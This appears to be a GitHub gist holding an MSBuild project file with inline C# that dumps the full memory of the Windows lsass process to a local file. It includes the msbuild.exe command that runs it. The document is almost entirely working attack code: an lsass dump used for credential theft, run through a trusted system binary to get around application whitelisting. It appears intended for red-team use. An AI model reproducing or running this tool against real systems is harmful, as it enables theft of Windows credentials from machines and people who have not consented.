Skip to content

Instantly share code, notes, and snippets.

@jackson5sec

jackson5sec/MSBuildProcDumper.csproj

Created February 22, 2018 22:15
Show Gist options
  • Save jackson5sec/f386c6e2861c5eceafc5110874e918c1 to your computer and use it in GitHub Desktop.
Save jackson5sec/f386c6e2861c5eceafc5110874e918c1 to your computer and use it in GitHub Desktop.
Download ZIP
MSBuild - Process Dumper - lsass example
Raw
MSBuildProcDumper.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<!-- <Reference Include="System.IO" /> Example Include -->
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Reflection;
using System.Runtime.Remoting;
using System.Threading;
using System.Globalization;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
Console.WriteLine("Hello From MSBuildProcDump!");
CreateMiniDump();
return true;
}
public static class MINIDUMPTYPE
{
public const int MiniDumpNormal = 0x00000000;
public const int MiniDumpWithDataSegs = 0x00000001;
public const int MiniDumpWithFullMemory = 0x00000002;
public const int MiniDumpWithHandleData = 0x00000004;
public const int MiniDumpFilterMemory = 0x00000008;
public const int MiniDumpScanMemory = 0x00000010;
public const int MiniDumpWithUnloadedModules = 0x00000020;
public const int MiniDumpWithIndirectlyReferencedMemory = 0x00000040;
public const int MiniDumpFilterModulePaths = 0x00000080;
public const int MiniDumpWithProcessThreadData = 0x00000100;
public const int MiniDumpWithPrivateReadWriteMemory = 0x00000200;
public const int MiniDumpWithoutOptionalData = 0x00000400;
public const int MiniDumpWithFullMemoryInfo = 0x00000800;
public const int MiniDumpWithThreadInfo = 0x00001000;
public const int MiniDumpWithCodeSegs = 0x00002000;
}
[DllImport("dbghelp.dll")]
public static extern bool MiniDumpWriteDump(
IntPtr hProcess, Int32 ProcessId, IntPtr hFile, int DumpType,
IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallackParam);
private static void CurrentDomainUnhandledException(
object sender, UnhandledExceptionEventArgs e)
{
CreateMiniDump();
}
public static void CreateMiniDump()
{
DateTime endTime = DateTime.Now;
string dt = endTime.ToString("yyyy.MM.dd.HH.mm.ss", DateTimeFormatInfo.InvariantInfo);
string dumpFileName = "Dump" + dt +".dmp";
FileStream fs = new FileStream(dumpFileName, FileMode.Create);
Process[] plist = Process.GetProcessesByName("lsass");
Process process = plist[0];
Console.WriteLine(process.Id);
MiniDumpWriteDump(
process.Handle, process.Id,
fs.SafeFileHandle.DangerousGetHandle(),
MINIDUMPTYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment